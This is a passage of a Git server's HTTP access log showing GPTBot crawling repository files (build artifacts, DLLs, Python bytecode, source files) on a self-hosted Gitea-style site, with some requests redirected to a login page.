compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11097] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14632] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14659] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14658] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14658] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14710] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=all" [Client 74.7.227.38] [Length 8472] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:16:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11857] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11855] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11854] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11816] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:55:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:55:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:55:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:55:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23808] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23799] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23830] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11342] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11371] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23829] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23798] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23815] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23804] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23805] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr 